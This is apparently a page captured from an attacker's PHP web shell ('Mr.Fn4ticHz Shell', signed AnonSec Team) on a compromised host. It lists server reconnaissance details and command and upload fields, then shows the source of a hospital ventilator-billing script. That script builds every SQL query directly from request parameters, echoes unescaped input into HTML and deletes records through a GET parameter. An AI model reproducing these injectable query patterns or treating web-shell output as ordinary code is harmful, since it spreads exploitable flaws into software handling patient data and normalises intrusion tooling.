Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 18.222.184.200
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in//Ventilator.php
<?php session_start();
require_once("../patientmanager.php");
require_once("../DBManager.php");
if(isset($_POST[Ventilatorva]))

	{
		PatientManager::Ventilator("$_GET[prescriptionid]","$_GET[patientid]","$_POST[Ventilator]","$_POST[Ventilator_start]","$_POST[duration]","$_POST[Ventilator_stop]","$_POST[entered_by]");
	 }

?>
<?php
include("dbconnection.php");
if(isset($_GET[delid]))
{
	$sql ="DELETE FROM 	Ventilator WHERE id='$_GET[delid]'";
	$qsql=mysqli_query($con,$sql);
	if(mysqli_affected_rows($con) == 1)
	{
	    	$sql1 ="DELETE FROM patient_invace WHERE pagetype='$_GET[delid]'";
	$qsql1=mysqli_query($con,$sql1);
	if(mysqli_affected_rows($con) == 1)
	{
		echo "<script>alert('Deleted successfully..');</script>";
	}
}
}
?>
<?php

if(isset($_POST['updateVentilator'])) 
{ 	
  	$sql6="UPDATE Ventilator SET Ventilator='$_POST[Ventilator]',Ventilator_stop='$_POST[Ventilator_stop]',duration='$_POST[duration]' WHERE patientid='$_GET[patientid]' AND prescriptionid='$_GET[prescriptionid]'  AND Ventilator='on' AND id='$_POST[id]'";
if($qsql6 = mysqli_query($con,$sql6))
		{
echo "<script>alert('Update successfully');</script><script>window.location='nursingrecodstest.php?prescriptionid=$_GET[prescriptionid]&patientid=$_GET[patientid]'</script>;</script>";

$sql4 ="SELECT * FROM Ventilator WHERE patientid='$_GET[patientid]' AND prescriptionid='$_GET[prescriptionid]' AND id='$_POST[id]'";
		$qsql4 = mysqli_query($con,$sql4);
		while($rpn = mysqli_fetch_array($qsql4))
		{
		   

$date1 =$rpn[Ventilator_start]; 
$date2 =$rpn[Ventilator_stop]; 
$timestamp1 = strtotime($date1);
$timestamp2 = strtotime($date2);
$hour = abs($timestamp2 - $timestamp1)/(60*60);
$d8=round($hour);

if ($rpn[Ventilator_stop]=='') {
if ($d8 < "1") {
}
} 

else
{
$total=$d8;
}
require_once('../DBManager.php');
require_once('../LoginManager.php');
$narayan=LoginManager::currentUser();
$usertype=LoginManager::getUserTypeByuname("$narayan");
$today = date('Y-m-d');
	$sql1 ="SELECT * FROM site_users WHERE userno='$usertype'";
		$qsql1 = mysqli_query($con,$sql1);
		if($re = mysqli_fetch_array($qsql1))
{
$sql56 ="SELECT * FROM request_for_admission WHERE prescriptionid='$_GET[prescriptionid]' AND patientid='$_GET[patientid]'";
		$qsql56 = mysqli_query($con,$sql56);
		while($rs56 = mysqli_fetch_array($qsql56))
		{
	$sql212 ="SELECT * FROM tarifrate WHERE tarifid='27' AND hospitalid='$re[entered_by]' AND wardid='$rs56[Ward]'";
$qsql212 = mysqli_query($con,$sql212);
if($rs112 = mysqli_fetch_array($qsql212))
{
    $subbill=$total*$rs112[rate];
  	//$msg=mysqli_query($con,"insert into patient_invace(patientid,	prescriptionid,discription,pagetype,link,pricetotal,discount,grand_total,paymentmode,status,entered_by,created_at,updated_at) values('$_GET[patientid]','$_GET[prescriptionid]','Oxyzen_Billing','$total','drinvace.php?prescriptionid=$_GET[prescriptionid]&patientid=$_GET[patientid]&id=$_POST[id]','$subbill','','','','','$usertype','','')");
		{
		    
		}
    
}
}
}
}

}
  	}
?>

<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="">
    <meta name="author" content="Dashboard">
    <meta name="keyword" content="Dashboard, Bootstrap, Admin, Template, Theme, Responsive, Fluid, Retina">

    <title>Ventilator </title>
 <h3><i class="fa fa-angle-right"></i> &nbsp; &nbsp; Ventilator  </h3>
           	
  <body>
      <?php
 $DisplayForm=True;
		$sql5 ="SELECT * FROM Ventilator WHERE patientid='$_GET[patientid]' AND prescriptionid='$_GET[prescriptionid]' AND Ventilator='on'";
		$qsql5 = mysqli_query($con,$sql5);
		if($rt5 = mysqli_fetch_array($qsql5))
		{
$DisplayForm=False;
date_default_timezone_set('Asia/Kolkata');
$date = date('y-m-d h:i:s');
echo "
<form name='updateVentilator' method='post'>";
include("dbconnection.php");
require_once('../DBManager.php');
require_once('../LoginManager.php');
  $narayan=LoginManager::currentUser();
$harilal=LoginManager::getUserTypeByuname("$narayan");
	$sql1 ="SELECT * FROM site_users WHERE userno='$harilal'";
		$qsql1 = mysqli_query($con,$sql1);
		if($re = mysqli_fetch_array($qsql1))
		

		
$transferbed="SELECT * FROM `request_for_admission` WHERE prescriptionid='$_GET[prescriptionid]' AND patientid='$_GET[patientid]' ";
$qTransferbed = mysqli_query($con,$transferbed);
		if($rTransferbed = mysqli_fetch_array($qTransferbed))

$sql41 ="SELECT * FROM Ventilator WHERE ward_id='$rTransferbed[Ward]' AND bed_id='$rTransferbed[Bed]'";
		$qsql41 = mysqli_query($con,$sql41);
		if($rpn1 = mysqli_fetch_array($qsql41))
		
 $date1 ="$rpn1[Ventilator_start]"; 

$date2 =$date; 
$timestamp1 = strtotime($date1);
$timestamp2 = strtotime($date2);
$hour = abs($timestamp2 - $timestamp1)/(60*60);

$d8=round($hour);


echo"
    <br>
  <input type='hidden' name='bedid' id='bedid' value='$rpn1[bed_id]'/>
  <input type='hidden' name='wardid' id='Ward' value='$rpn1[ward_id]'/>
  
    <input type='hidden' name='duration' id='duration' value='$d8'/>
    
    ";

 echo "<input type='hidden' name='id' value='$rt5[id]'>

 <input type='hidden' name='Ventilator_stop' value='20$date'>
 <script>
var today = new Date();
var time = today.getHours() + ':' + today.getMinutes() + ':' + today.getSeconds();
  document.getElementById('myCheckVentilator').value = time;
</script>
<button type='submit' name='updateVentilator'>Stop</button>
  </form>";
		}
if($DisplayForm)
{
?>
<form name="Ventilatorva" method="post">
    <input type='hidden' value='on' name='Ventilator'>
    <?php
    date_default_timezone_set('Asia/Kolkata');
$date = date('y-m-d h:i:s');
echo"
 <input type='hidden' name='Ventilator_start' value='20$date'>
 ";
 ?>
 <script>
var today = new Date();
var time = today.getHours() + ':' + today.getMinutes() + ':' + today.getSeconds();
  document.getElementById('myCheckVentilatorstart').value = time;
</script>
<button type='submit' name='Ventilatorva'>Start</button>
  </form>
           	  <?php
}
?>	
           	
          	<style>
    form{
        margin: 20px 0;
    }
    form input, button{
        padding: 5px;
    }
    table{
        width: 100%;
        margin-bottom: 20px;
		border-collapse: collapse;
    }
    table, th, td{
        border: 1px solid #cdcdcd;
    }
    table th, table td{
        padding: 10px;
        text-align: left;
    }
	<style>
           
			table{
    border: solid 1px gray;
    width: 100%;
  }
  </style>
  </head>
 
    <div id="container">
 <table border="1" class='table table-hover table-bordered'>
      <tbody>
                  <tr>
          <th><div align="center">Start At <br>
          (YYYY-MM-DD)</div></th>
          <th><div align="center">Stop At <br>
          (YYYY-MM-DD)</div></th>
            <th><div align="center">Duration </div></th>
          <th><div align="center">Created By</div></th> 
          <th><div align="center">Action</div></th>    

               </tr>
        </tbody>
<?php
include("dbconnection.php");
require_once('../DBManager.php');
require_once('../LoginManager.php');
	  $narayan=LoginManager::currentUser();
$harilal=LoginManager::getUserTypeByuname("$narayan");
	$sql1 ="SELECT * FROM site_users WHERE userno='$harilal'";
		$qsql1 = mysqli_query($con,$sql1);
		while($re = mysqli_fetch_array($qsql1))
		{
$sql4 ="SELECT * FROM Ventilator WHERE patientid='$_GET[patientid]' AND prescriptionid='$_GET[prescriptionid]'";
		$qsql4 = mysqli_query($con,$sql4);
		while($rpn = mysqli_fetch_array($qsql4))
		{
		    
		    $date1 =$rpn[Ventilator_start]; 

$date2 =$rpn[Ventilator_stop]; 
$timestamp1 = strtotime($date1);
$timestamp2 = strtotime($date2);
$hour = abs($timestamp2 - $timestamp1)/(60*60);

$d8=round($hour);
echo " <tbody>
	                <tr>
             <td>&nbsp;$rpn[Ventilator_start]</td>
                   <td>&nbsp;$rpn[Ventilator_stop]</td>
                 
                    <td>";
if ($rpn[Ventilator_stop]=='') {
if ($d8 < "1") {
}
} 

else
{
    echo"$d8 <input type='hidden' name='duration' id='duration' value='$d8'/>";
}


    echo"</td>
       <td>&nbsp;$re[name]</td>
                  <td style='width:25%'><a href='edit_showVentilator.php?prescriptionid=$rpn[prescriptionid]&patientid=$rpn[patientid]&id=$rpn[id]' style='width:15%'><i class='fa fa-pencil-square-o' aria-hidden='true' style='font-size:20px;width:10%'></i></a> | <a href='nursingrecodstest.php?prescriptionid=$rpn[prescriptionid]&patientid=$rpn[patientid]&delid=$rpn[id]'  style='width:15%'><i class='fa fa-trash-o' aria-hidden='true' style='font-size:20px;color:red;width:10%'></i></a></td>
                                 </tr>                   
          
          ";


}

}

?>   
</tbody>
  <tfoot>
          </tfoot>
        </table>



      </div>

Anon7 - 2022
AnonSec Team